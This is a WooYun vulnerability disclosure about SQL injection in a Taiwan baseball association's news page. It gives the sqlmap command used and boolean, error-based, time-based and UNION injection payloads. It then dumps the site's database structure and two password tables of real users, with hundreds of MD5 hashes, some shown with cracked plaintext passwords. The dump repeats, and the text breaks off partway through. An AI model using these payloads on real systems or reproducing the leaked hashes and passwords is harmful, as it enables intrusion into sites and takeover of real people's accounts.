当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0155545

漏洞标题:台湾棒球協會主站存在SQL植入漏洞(26萬網站記錄泄露+大量用戶密碼泄露)(臺灣地區)

相关厂商:台湾棒球協會

漏洞作者: 路人甲

提交时间:2015-11-24 16:26

修复时间:2016-01-11 21:46

公开时间:2016-01-11 21:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-24: 细节已通知厂商并且等待厂商处理中
2015-11-27: 厂商已经确认,细节仅向厂商公开
2015-12-07: 细节向核心白帽子及相关领域专家公开
2015-12-17: 细节向普通白帽子公开
2015-12-27: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

台湾棒球協會成立於民國62年2月28日,成立宗旨為發展棒球運動、辦理全國性及國際性棒球賽會,藉以提高技術水準、增進國民 健康及發揚運動精神。
  中華棒協的主要工作除各項政策的擬定、執行及舉辦業餘賽事外,各級國家代表隊的選拔、訓練、參賽亦為協會的重要任務。目前中華 棒協為國際棒球總會(IBAF)、亞洲棒球總會(BFA)、世界少棒聯盟(LLB)、美國小馬聯盟(PONY)、世界兒童棒球夏令營(WCBF) 以及美國、日本、韓國各職棒聯盟等重要國際組織之聯繫窗口,每年固定組隊參加超過15項重大國際賽事。多年來,我國棒球運動健兒在國 際舞台上屢屢發光發熱,這也是全體國民共同感到驕傲的光榮時刻。
  彭誠浩先生於民國87年接任本會第7屆的理事長,並於民國91年連任第8屆理事長,喜愛棒球運動的他除了增加許多年度例行賽事,讓業 餘球員得以擁有更多的比賽實戰經驗外,彭誠浩先生任內積極爭取各項國際大賽在台舉辦,奠定台灣在國際棒壇中的樞紐地位,有效提昇國內 棒球實力並打開國際能見度。彭誠浩先生目前除擔任本會副理事長外,同時擔任國際棒球總會執行委員乙職.

详细说明:

地址:http://**.**.**.**/news_detail.php?cate=game&type=3&id=5694

$ python sqlmap.py -u "http://**.**.**.**/news_detail.php?cate=game&type=3&id=5694" -p type --technique=BETU --random-agent --batch  --current-user --is-dba --users --passwords --count --search -C pass


Database: ctba
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| record_all | 265436 |


Database: ctba
Table: record_all
[13 columns]
+-----------------+------------------+
| Column | Type |
+-----------------+------------------+
| player_id_b | int(10) |
| player_id_p | int(10) |
| rec_1b | char(1) |
| rec_2b | char(1) |
| rec_3b | char(1) |
| rec_bhand | char(1) |
| rec_calendar_id | int(10) |
| rec_er | int(1) |
| rec_id | int(11) unsigned |
| rec_inning | varchar(3) |
| rec_r | int(1) |
| rec_rbi | int(1) |
| rec_result | varchar(10) |
+-----------------+------------------+


Database: ctba
Table: register_team
[1 column]
+---------------+-------------+
| Column | Type |
+---------------+-------------+
| team_password | varchar(40) |
+---------------+-------------+
Database: ctba
Table: undertaker_id
[1 column]
+---------------+-------------+
| Column | Type |
+---------------+-------------+
| User_Password | varchar(32) |
+---------------+-------------+
Database: ctba
Table: undertaker_id
[34 entries]
+-------------------------------------------+
| User_Password |
+-------------------------------------------+
| 0148cc852947d2143365ddaecfb8ef3c |
| 09a25f5ed04a9ae39baa05a96c83beea |
| 112e50e586dbd0aa1bd8f50631435362 |
| 1a100d2c0dab19c4430e7d73762b3423 (333333) |
| 32a6b3e99e666238eab74408537ef4dc |
| 373e27192e958d686aee0d231eee0c6b |
| 383f44b986ea3d924a5cf9a4aa947e83 |
| 39168e1c2e8d7f55546c1fdcc5d80784 |
| 3daee40fb3fa42f404b1054911ae2ecf |
| 4476fd5cd467bf8d90b3ab16a621b140 |
| 4dff85423d3a1290479e1552e372e978 |
| 5b1b68a9abf4d2cd155c81a9225fd158 (555555) |
| 5b69dd09f41ddcbac3e89aab7a2cb6db (Paul61) |
| 5e4f440ad747f6808dd2a00841d9daa1 |
| 62d28b5c48de44e9822a609eb8a0932f |
| 639be6269e4e4ecdfed07477d96d6fae |
| 6b18e867b078145916ac14e851659236 |
| 73882ab1fa529d7273da0db6b49cc4f3 (444444) |
| 7c670c88c662d82061636bcfd8d72b96 |
| 81dc9bdb52d04dc20036dbd8313ed055 (1234) |
| 86330a575bead534005cf1ed6ecac873 |
| 8a02469eb889ae96832833f1ce953991 |
| 8fbd6961e2865cc5d15df3f965010695 |
| 96e79218965eb72c92a549dd5a330112 (111111) |
| 99394ab4799c60067c43fb8a527cb243 (trible) |
| 9b8acde90cf3fcbf5bf7386b4a37a77e |
| a9f80616b162725158ae3d0147b9fcbe |
| b2cc602644101b14d4e4af26c1178d4a |
| b5bdb91f62a685fe7fb55a4196f0fc00 |
| ba7434e01d41ee3e0e20b41a26d7f63c |
| be50d033e4de4a0129f0a755673a5780 |
| c4c455df3c54f292ae22f6791fd2553e (6010) |
| e3ceb5881a0a1fdaad01296d7554868d (222222) |
| f003084ec2e68bc43315787da10b5227 |
+-------------------------------------------+
Database: ctba
Table: register_team
[252 entries]
+-----------------------------------------------+
| team_password |
+-----------------------------------------------+
| 0155e04ff0eea65c9ae3319793ca5ccf |
| 0191be845090a7e0daf141d89c948229 (121306) |
| 024f7c95069852457f511afea1cce63d |
| 038dcb4e7f0d0bc6e0f86660762abc6a |
| 04ff3ef2faf0dc5cbccd13c574933f08 |
| 052df1e556c7512c5b4020614aee011f |
| 058ba58f9cac5941ffa8ec6ac95fa175 |
| 0738cf379c105401f245c624e304465f |
| 08124000e62128d281d9ca52e57432c9 |
| 086014c3a1a5a3173c054a33c74e1f40 |
| 0b9deb4536cf71d9c7c9fdc9320e3132 |
| 0e391967942dca8b88e12b904a0d8461 |
| 1041d1415680ea6e6390808c55ce1b76 |
| 128f93f2a8c01a1137ec695437c6a17d |
| 12fd20677edaf3209d96e277e98c2f69 |
| 161ff544fc2d75a8c8d72aebedd7dd70 |
| 188c6540500e4877a35370d31b22b3dc (134134) |
| 18f22b46449fb3d68511081bf94d7f8e |
| 190b0462da9e1ed80b9b1ad9a2c8b9b1 |
| 1b0230fd67a830ceeb75fc9d7bd1fd00 |
| 1bb984f293a9dc4cd869e1d41dc56b02 |
| 1fed3a064ae97d42fdbc52639f2a9ae9 |
| 2274936e37a7a507b6a2bb4d50833e0d |
| 22ec85543ee3322c1ab9712185473a52 |
| 248aa42dc8ea0510e645b4977d87f8a9 |
| 25ebc8894d7191e8c276e7451adb5cde |
| 276f8db0b86edaa7fc805516c852c889 (baseball) |
| 276f8db0b86edaa7fc805516c852c889 (baseball) |
| 29096b12f6b5ee925177d131e307718f |
| 29c1a8d75fbe8f4c6ce88881e59e67dd |
| 29fc70fc7623aef1f5531a364776bd8c |
| 2b879bead5dfb516cd9e800411708b61 |
| 2d0069d8a191754a0b3e300ba4d2c392 |
| 2d6ef2afb4147ac61909fccaf608b960 |
| 2da01eea5274d3ae18de8a68b7c37d04 |
| 2df8260db2ea39de5b7b2bfcc2cc7b1e |
| 2dfc804a2da30fd5e63234abb2886477 |
| 2e74ca5494c1f7d16a0b650be5d4e059 |
| 31fb5e8c962a9bf062597bc2ce9533b9 (020407) |
| 330520e8845a58a50e8f25b8411032be |
| 3384ace9a48c23d689f347236c7ab49a |
| 34f3e4c190b3b9632175c0ebadf52a6a |
| 354fe3256187cd121eb64aa04415ec8c |
| 362ec0dd6e38c58bd913c481a85ba7c2 |
| 36e958b88e725228f9080dc9acee482d |
| 38a9202a110a517ecfc834bacffadd75 |
| 3ab28c4cfe09f3950ac9cb4fc40f5380 |
| 3d6e5c75ceb1445b4a3c1cd590675acb |
| 408e2fe9f96022a15c6b12da05fbf31d |
| 4496bf24afe7fab6f046bf4923da8de6 (1828) |
| 44e0b5cf65ff2ad34eacbe661875a91c |
| 4543a55aadbf7a448b3064bb7e8dc51d |
| 45a40f28e0c02bc3a88231b25ecf27e9 |
| 4ad5248602d0a3e3c0ed33501aa19c1b |
| 4ae9f8866a79b5aa326685c75cff7fdd |
| 4b75751e170e00f56886726c3f46eecd (kyle) |
| 4dacbb86597063c48da2f802a0f09769 |
| 4e6d0391ac94b232a522849c02604815 |
| 4f74c3218ff97c494795cea8d2f10a40 |
| 5002dd4914b6629ae981f7a043f6b216 |
| 52d9bcfea1dc6864f90db09b4cbadc62 |
| 5353e6a57acfa90036a4b214ba927a7e |
| 544ed9c5c94b539debcebf40ba8b0119 |
| 568d54e6bb51e65202d04e1a8d8decee |
| 577410ce3204de90515756b6db2e9412 |
| 58f7faf622e4c64c6b51fe7fcef5971a |
| 5ab4852244df59d508129dec10ba39e7 |
| 5e95ab5a8230e25d7f049f6775f1462e |
| 5ea0f299aa01fc503d354d882edc5408 |
| 5f5ea3012c6c053f5136ff5620902e3b |
| 68adfa3e7cda12e2f49eaf57cb54c230 |
| 6e5fe264d64fe77f3313e36e54a27398 |
| 6fff07c66b69e2bd49fe7359c3b92bb9 |
| 7094a42a7601dc5f8b0f08a825a4d2db |
| 7136b4913719aacabae0b0d1d42ab6fe |
| 7136c6c02e6a3793d07a55d4766a8950 |
| 71f604f951705365a91dac166db92fa8 |
| 7317043a8f8f2e191e9d08343f2a14c3 |
| 73ab7379293bf46538e84373acc78d23 |
| 7423a2cdd5451baae7b011559b4cab12 |
| 7635c79ee6133ff09e1c9975af6a3a86 |
| 76f37252dd883c1783a1e93b7ae1ff17 |
| 78591c9a861e472baf090c4357accce7 |
| 7c947ecbf96cb409ecaf3c85d217dc22 |
| 7cdb0b52823b806f967d147ed80b7142 |
| 7ce76d7cf1c5c0f0e4fd8b09679e2794 |
| 7e30860d92a02e9cecc80dc489de8600 |
| 7eabe3a1649ffa2b3ff8c02ebfd5659f (206) |
| 7f49165ae6114b59d6aa568e0db9ce2f |
| 81dc9bdb52d04dc20036dbd8313ed055 (1234) |
| 81dc9bdb52d04dc20036dbd8313ed055 (1234) |
| 8305f85e9c34d17da0123ba6e8e77ec0 |
| 84a6084644c12a29f7fb7c30d9ffbf8a |
| 85a31289f3623c8949f813f49767e268 |
| 875009e17e665fb0d127f6ab143bc769 |
| 87798d9d48efd23950b47489b3872835 |
| 898f605897a2660ac19e9c744f4fb526 |
| 8bffe9429d678c52e016cc6c894d6eba |
| 8d118e01c6f41867cb45afb04d663b57 (090305) |
| 8d4a07a217274d3936f52f16cea719a5 |
| 8d93feb392e84f791d0acf53b471db36 |
| 90aec4afc250d3779ca839f9fe3dd55e |
| 91056043e8b99be32209d24a44bed0ca |
| 91322d5375963e3007138e19195ed560 |
| 913d47d4b582e77d4556b939f59071ba |
| 931880b5f89163a6768c916ef9ca327c |
| 95878e02160e98e5c52b712cc12ba3d4 |
| 96b212bcfdaae849a1e7991a008979a0 |
| 9835cf92e8b11a52e3a23ca5a9e7e561 |
| 99711c50a948afdf213fb4da45f68ce2 |
| 99770d9762edecb3fd5a50c9e97f1601 |
| 9aef9c4bcee3fea4ea627f408ec07b35 |
| 9b5b0fc94396e6327ac4b7bec8cbb0e1 |
| 9c15315e6623e09bb4171457ffeae6a0 |
| 9cbf8a4dcb8e30682b927f352d6559a0 (123456a) |
| 9db63143ef0096137fbcf27d6f8a2d59 |
| 9f3e2fe4bfb8e092633c83fe08beec88 |
| a05c04be378a7197474aae4fc77d50b5 |
| a1324603d9b1a22277809229934a36fd |
| a385db8d1fb6efa08e2bd81a8832f6e6 |
| a4eca9639a4c44026b37d2d6ecc9e8a6 |
| a4f20e2254e50ae4869acec59085c97b |
| a5992fa77608cdf30bb77f751a7544e0 |
| a6bad684d23f0d0cd28c2d228d6c3204 |
| a6de74ce6e778d71e51a4d611e20235b |
| aa0d2a804a3510442f2fd40f2100b054 (5353) |
| aa85abc2ea6d5f75b4835244429bb89c |
| acb2fda943c93f19f4474a77f5d26851 |
| adb2bb6dbad1fd4cc98b7da2477c01e9 |
| b43f116f81aeb9c12ba67fc3f8f84707 |
| b49c35f006e255a3d7fabb719a210ab3 |
| bb10820886460bc2f132831c3c621288 |
| bc1f6c33378ebfaf9033af56e2dd5af8 |
| bc7e39dce5761c7777dc7aa35b5ca770 |
| bd155b378d0918dd3e931bb5ff80092c |
| c398c315bd27d5a44050de25df0e4de2 |
| c975d3b2a93bf3b53983569737ce9a9c |
| cb6682f9983f2c93d21d725306e93ebd |
| cd2acea595e93463bc8ea3b6d1583fc9 (0321) |
| cd396698aee89e20bb7ee407e7a8e59c |
| ce94e8e4da9c82c35e818993aaa6e8c4 |
| cf06f5fce9ddf4eccdf49e4ec941dd34 |
| cf5e9d0beca4c810f69c242be4eeef47 |
| d0970714757783e6cf17b26fb8e2298f (112233) |
| d2b23b1514a3474743e09026597fb00f |
| d3e0bf8e9ab38a59ae5cd05043fa63c7 |
| d55fc9c88b6183fbdfb29b09ffd00f68 |
| d8b47331f850e426bc1ed3d79357aff2 |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e282d1cf59bc440f418e92b618e37e14 (180404) |
| e52ce7ec465331a59618f9b7a9cde01f |
| e687f9d8e0057a0df4b29d1950accc16 |
| e7870c1ead6e9ff16b0372aa9a7c5f1d |
| e807f1fcf82d132f9bb018ca6738a19f (1234567890) |
| ec2d748dd8ebbe57a8aa437335dac40e |
| ed9b877050e565bf90f38efa01e86183 |
| f00b8fc4f154d3c3657a0a96089b54ad |
| f166cce76594c3330849cce8ff149950 |
| f17f496114257958694ee1be75bdabe6 |
| f2b3e0105fbfd24a0e12dede5f01353e |
| f573e528c6f84971caccb669d6c21e40 (341302) |
| f6633bd140c595a684c96dbfda0f8911 |
| f6ccba3c2031da35da75efe44805f20a |
| f7d3cdde467986687747c724fdb4ecba |
| f8b74066ef624b80561fba631ddc6189 |
| f9b99740b3e953f65230685fb47b3a9a |
| fb8caf1131954ed0f9fca70356e77020 |
| fcc180feed12b433f79e6a82064b09e0 |
| fcea920f7412b5da7be0cf42b8c93759 (1234567) |
| fd776919ff9b8fe0fb9739339877c8c2 |
| fe27c4f551fae15918ca1c56e048dd28 |
+-----------------------------------------------+


漏洞证明:

---
Parameter: type (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cate=game&type=3 AND 5373=5373&id=5694
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: cate=game&type=3 AND (SELECT 5870 FROM(SELECT COUNT(*),CONCAT(0x7162767171,(SELECT (ELT(5870=5870,1))),0x716a6a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&id=5694
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: cate=game&type=3 AND (SELECT * FROM (SELECT(SLEEP(5)))pazb)&id=5694
Type: UNION query
Title: MySQL UNION query (NULL) - 58 columns
Payload: cate=game&type=-7466 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162767171,0x7547446c7269416451444379784d6f53474b555a4e457154566546554c446959486a757152584e6b,0x716a6a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&id=5694
---
web application technology: PHP 4.4.4, Apache 2.0.64
back-end DBMS: MySQL 5.0
current user: 'ctba@localhost'
current user is DBA: False
database management system users [1]:
[*] 'ctba'@'localhost'
Database: ctba
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| record_all | 265436 |
| record_order | 70160 |
| record_running | 55077 |
| record_player | 47508 |
| survey_answer | 20663 |
| record_league_batter | 13923 |
| record_league_pitcher | 7019 |
| calendar_mssgs | 6221 |
| live_score | 6002 |
| articles_data | 5219 |
| record_game | 3579 |
| photo_info | 3030 |
| register_player | 2847 |
| register_game_player | 2779 |
| record_team | 2630 |
| record_standing | 2312 |
| register_game_staff | 657 |
| register_staff | 653 |
| record_pitcher | 600 |
| game_info | 290 |
| register_team | 252 |
| record_situation | 182 |
| survey_option | 108 |
| undertaker_id | 34 |
| marquee_info | 25 |
| ad_info | 21 |
| file_info | 16 |
| survey_info | 14 |
| event_info | 9 |
| record_adjust | 5 |
| video_info | 4 |
| register_game | 3 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 698 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 126 |
| COLLATIONS | 126 |
| STATISTICS | 53 |
| TABLES | 53 |
| CHARACTER_SETS | 36 |
| KEY_COLUMN_USAGE | 36 |
| TABLE_CONSTRAINTS | 32 |
| SCHEMA_PRIVILEGES | 16 |
| SCHEMATA | 3 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: ctba
Table: register_team
[1 column]
+---------------+-------------+
| Column | Type |
+---------------+-------------+
| team_password | varchar(40) |
+---------------+-------------+
Database: ctba
Table: undertaker_id
[1 column]
+---------------+-------------+
| Column | Type |
+---------------+-------------+
| User_Password | varchar(32) |
+---------------+-------------+
Database: ctba
Table: undertaker_id
[34 entries]
+-------------------------------------------+
| User_Password |
+-------------------------------------------+
| 0148cc852947d2143365ddaecfb8ef3c |
| 09a25f5ed04a9ae39baa05a96c83beea |
| 112e50e586dbd0aa1bd8f50631435362 |
| 1a100d2c0dab19c4430e7d73762b3423 (333333) |
| 32a6b3e99e666238eab74408537ef4dc |
| 373e27192e958d686aee0d231eee0c6b |
| 383f44b986ea3d924a5cf9a4aa947e83 |
| 39168e1c2e8d7f55546c1fdcc5d80784 |
| 3daee40fb3fa42f404b1054911ae2ecf |
| 4476fd5cd467bf8d90b3ab16a621b140 |
| 4dff85423d3a1290479e1552e372e978 |
| 5b1b68a9abf4d2cd155c81a9225fd158 (555555) |
| 5b69dd09f41ddcbac3e89aab7a2cb6db (Paul61) |
| 5e4f440ad747f6808dd2a00841d9daa1 |
| 62d28b5c48de44e9822a609eb8a0932f |
| 639be6269e4e4ecdfed07477d96d6fae |
| 6b18e867b078145916ac14e851659236 |
| 73882ab1fa529d7273da0db6b49cc4f3 (444444) |
| 7c670c88c662d82061636bcfd8d72b96 |
| 81dc9bdb52d04dc20036dbd8313ed055 (1234) |
| 86330a575bead534005cf1ed6ecac873 |
| 8a02469eb889ae96832833f1ce953991 |
| 8fbd6961e2865cc5d15df3f965010695 |
| 96e79218965eb72c92a549dd5a330112 (111111) |
| 99394ab4799c60067c43fb8a527cb243 (trible) |
| 9b8acde90cf3fcbf5bf7386b4a37a77e |
| a9f80616b162725158ae3d0147b9fcbe |
| b2cc602644101b14d4e4af26c1178d4a |
| b5bdb91f62a685fe7fb55a4196f0fc00 |
| ba7434e01d41ee3e0e20b41a26d7f63c |
| be50d033e4de4a0129f0a755673a5780 |
| c4c455df3c54f292ae22f6791fd2553e (6010) |
| e3ceb5881a0a1fdaad01296d7554868d (222222) |
| f003084ec2e68bc43315787da10b5227 |
+-------------------------------------------+
Database: ctba
Table: register_team
[252 entries]
+-----------------------------------------------+
| team_password |
+-----------------------------------------------+
| 0155e04ff0eea65c9ae3319793ca5ccf |
| 0191be845090a7e0daf141d89c948229 (121306) |
| 024f7c95069852457f511afea1cce63d |
| 038dcb4e7f0d0bc6e0f86660762abc6a |
| 04ff3ef2faf0dc5cbccd13c574933f08 |
| 052df1e556c7512c5b4020614aee011f |
| 058ba58f9cac5941ffa8ec6ac95fa175 |
| 0738cf379c105401f245c624e304465f |
| 08124000e62128d281d9ca52e57432c9 |
| 086014c3a1a5a3173c054a33c74e1f40 |
| 0b9deb4536cf71d9c7c9fdc9320e3132 |
| 0e391967942dca8b88e12b904a0d8461 |
| 1041d1415680ea6e6390808c55ce1b76 |
| 128f93f2a8c01a1137ec695437c6a17d |
| 12fd20677edaf3209d96e277e98c2f69 |
| 161ff544fc2d75a8c8d72aebedd7dd70 |
| 188c6540500e4877a35370d31b22b3dc (134134) |
| 18f22b46449fb3d68511081bf94d7f8e |
| 190b0462da9e1ed80b9b1ad9a2c8b9b1 |
| 1b0230fd67a830ceeb75fc9d7bd1fd00 |
| 1bb984f293a9dc4cd869e1d41dc56b02 |
| 1fed3a064ae97d42fdbc52639f2a9ae9 |
| 2274936e37a7a507b6a2bb4d50833e0d |
| 22ec85543ee3322c1ab9712185473a52 |
| 248aa42dc8ea0510e645b4977d87f8a9 |
| 25ebc8894d7191e8c276e7451adb5cde |
| 276f8db0b86edaa7fc805516c852c889 (baseball) |
| 276f8db0b86edaa7fc805516c852c889 (baseball) |
| 29096b12f6b5ee925177d131e307718f |
| 29c1a8d75fbe8f4c6ce88881e59e67dd |
| 29fc70fc7623aef1f5531a364776bd8c |
| 2b879bead5dfb516cd9e800411708b61 |
| 2d0069d8a191754a0b3e300ba4d2c392 |
| 2d6ef2afb4147ac61909fccaf608b960 |
| 2da01eea5274d3ae18de8a68b7c37d04 |
| 2df8260db2ea39de5b7b2bfcc2cc7b1e |
| 2dfc804a2da30fd5e63234abb2886477 |
| 2e74ca5494c1f7d16a0b650be5d4e059 |
| 31fb5e8c962a9bf062597bc2ce9533b9 (020407) |
| 330520e8845a58a50e8f25b8411032be |
| 3384ace9a48c23d689f347236c7ab49a |
| 34f3e4c190b3b9632175c0ebadf52a6a |
| 354fe3256187cd121eb64aa04415ec8c |
| 362ec0dd6e38c58bd913c481a85ba7c2 |
| 36e958b88e725228f9080dc9acee482d |
| 38a9202a110a517ecfc834bacffadd75 |
| 3ab28c4cfe09f3950ac9cb4fc40f5380 |
| 3d6e5c75ceb1445b4a3c1cd590675acb |
| 408e2fe9f96022a15c6b12da05fbf31d |
| 4496bf24afe7fab6f046bf4923da8de6 (1828) |
| 44e0b5cf65ff2ad34eacbe661875a91c |
| 4543a55aadbf7a448b3064bb7e8dc51d |
| 45a40f28e0c02bc3a88231b25ecf27e9 |
| 4ad5248602d0a3e3c0ed33501aa19c1b |
| 4ae9f8866a79b5aa326685c75cff7fdd |
| 4b75751e170e00f56886726c3f46eecd (kyle) |
| 4dacbb86597063c48da2f802a0f09769 |
| 4e6d0391ac94b232a522849c02604815 |
| 4f74c3218ff97c494795cea8d2f10a40 |
| 5002dd4914b6629ae981f7a043f6b216 |
| 52d9bcfea1dc6864f90db09b4cbadc62 |
| 5353e6a57acfa90036a4b214ba927a7e |
| 544ed9c5c94b539debcebf40ba8b0119 |
| 568d54e6bb51e65202d04e1a8d8decee |
| 577410ce3204de90515756b6db2e9412 |
| 58f7faf622e4c64c6b51fe7fcef5971a |
| 5ab4852244df59d508129dec10ba39e7 |
| 5e95ab5a8230e25d7f049f6775f1462e |
| 5ea0f299aa01fc503d354d882edc5408 |
| 5f5ea3012c6c053f5136ff5620902e3b |
| 68adfa3e7cda12e2f49eaf57cb54c230 |
| 6e5fe264d64fe77f3313e36e54a27398 |
| 6fff07c66b69e2bd49fe7359c3b92bb9 |
| 7094a42a7601dc5f8b0f08a825a4d2db |
| 7136b4913719aacabae0b0d1d42ab6fe |
| 7136c6c02e6a3793d07a55d4766a8950 |
| 71f604f951705365a91dac166db92fa8 |
| 7317043a8f8f2e191e9d08343f2a14c3 |
| 73ab7379293bf46538e84373acc78d23 |
| 7423a2cdd5451baae7b011559b4cab12 |
| 7635c79ee6133ff09e1c9975af6a3a86 |
| 76f37252dd883c1783a1e93b7ae1ff17 |
| 78591c9a861e472baf090c4357accce7 |
| 7c947ecbf96cb409ecaf3c85d217dc22 |
| 7cdb0b52823b806f967d147ed80b7142 |
| 7ce76d7cf1c5c0f0e4fd8b09679e2794 |
| 7e30860d92a02e9cecc80dc489de8600 |
| 7eabe3a1649ffa2b3ff8c02ebfd5659f (206) |
| 7f49165ae6114b59d6aa568e0db9ce2f |
| 81dc9bdb52d04dc20036dbd8313ed055 (1234) |
| 81dc9bdb52d04dc20036dbd8313ed055 (1234) |
| 8305f85e9c34d17da0123ba6e8e77ec0 |
| 84a6084644c12a29f7fb7c30d9ffbf8a |
| 85a31289f3623c8949f813f49767e268 |
| 875009e17e665fb0d127f6ab143bc769 |
| 87798d9d48efd23950b47489b3872835 |
| 898f605897a2660ac19e9c744f4fb526 |
| 8bffe9429d678c52e016cc6c894d6eba |
| 8d118e01c6f41867cb45afb04d663b57 (090305) |
| 8d4a07a217274d3936f52f16cea719a5 |
| 8d93feb392e84f791d0acf53b471db36 |
| 90aec4afc250d3779ca839f9fe3dd55e |
| 91056043e8b99be32209d24a44bed0ca |
| 91322d5375963e3007138e19195ed560 |
| 913d47d4b582e77d4556b939f59071ba |
| 931880b5f89163a6768c916ef9ca327c |
| 95878e02160e98e5c52b712cc12ba3d4 |
| 96b212bcfdaae849a1e7991a008979a0 |
| 9835cf92e8b11a52e3a23ca5a9e7e561 |
| 99711c50a948afdf213fb4da45f68ce2 |
| 99770d9762edecb3fd5a50c9e97f1601 |
| 9aef9c4bcee3fea4ea627f408ec07b35 |
| 9b5b0fc94396e6327ac4b7bec8cbb0e1 |
| 9c15315e6623e09bb4171457ffeae6a0 |
| 9cbf8a4dcb8e30682b927f352d6559a0 (123456a) |
| 9db63143ef0096137fbcf27d6f8a2d59 |
